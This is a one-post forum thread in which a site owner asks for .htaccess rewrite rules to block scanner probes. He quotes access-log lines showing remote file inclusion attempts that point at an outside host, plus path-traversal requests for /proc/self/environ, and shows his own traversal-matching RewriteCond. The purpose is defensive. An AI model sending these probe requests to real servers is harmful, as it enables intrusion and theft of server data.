htaccess question

Page 1 of 1

[ 1 post ]

Print view

Previous topic | Next topic

Author

Message

nathanrdotca

Post subject: htaccess question

Posted: 24 Sep 2008 23:49

Joined: 24 Sep 2008 23:45
Posts: 1

I wonder if I could have some help please, to craft some rewrite rules to block stuff like this:

Quote:

200.234.200.147 - - [24/Sep/2008:22:32:26 +0000] "GET /humour/dork-torchwood/vuln=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 301 -
200.234.200.147 - - [24/Sep/2008:22:32:27 +0000] "GET /opinion/i-am-apparently-a-facebook-spammer/??? HTTP/1.1" 200 44747
200.234.200.147 - - [24/Sep/2008:22:32:29 +0000] "GET /humour/dork-torchwood/errors.php?error=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 404 36841
200.234.200.147 - - [24/Sep/2008:22:32:31 +0000] "GET /humour/dork-torchwood/vuln=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 400 365
200.234.200.147 - - [24/Sep/2008:22:32:31 +0000] "GET /humour/dork-torchwood/vuln=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 38053
200.234.200.147 - - [24/Sep/2008:22:32:34 +0000] "GET /vuln=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 301 -
200.234.200.147 - - [24/Sep/2008:22:32:35 +0000] "GET /opinion/i-am-apparently-a-facebook-spammer/??? HTTP/1.1" 200 44748
200.234.200.147 - - [24/Sep/2008:22:32:37 +0000] "GET /errors.php?error=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 404 36775
200.234.200.147 - - [24/Sep/2008:22:32:39 +0000] "GET /vuln=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 400 365
200.234.200.147 - - [24/Sep/2008:22:32:45 +0000] "GET /humour/vuln=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 301 -
200.234.200.147 - - [24/Sep/2008:22:32:40 +0000] "GET /vuln=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 37986
200.234.200.147 - - [24/Sep/2008:22:32:46 +0000] "GET /opinion/i-am-apparently-a-facebook-spammer/??? HTTP/1.1" 200 44748
200.234.200.147 - - [24/Sep/2008:22:32:48 +0000] "GET /humour/errors.php?error=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 404 36796
200.234.200.147 - - [24/Sep/2008:22:32:50 +0000] "GET /humour/vuln=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 400 365
200.234.200.147 - - [24/Sep/2008:22:32:50 +0000] "GET /humour/vuln=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 38007

They are not harming anything, but I get the occasional request for exploits such as these & it's annoying to see.

I thought I had a directory transversal rule but it's not helping.

This is what I have:

Quote:

RewriteCond %{QUERY_STRING} (\.\./|/\.\.|\./\.)

Maybe someone can suggest something better?

Thanks.

Top

Page 1 of 1

[ 1 post ]

Board index » .htaccess file Help » Redirect or Rewrite Questions

All times are UTC [ DST ]

Who is online

Users browsing this forum: No registered users and 13 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum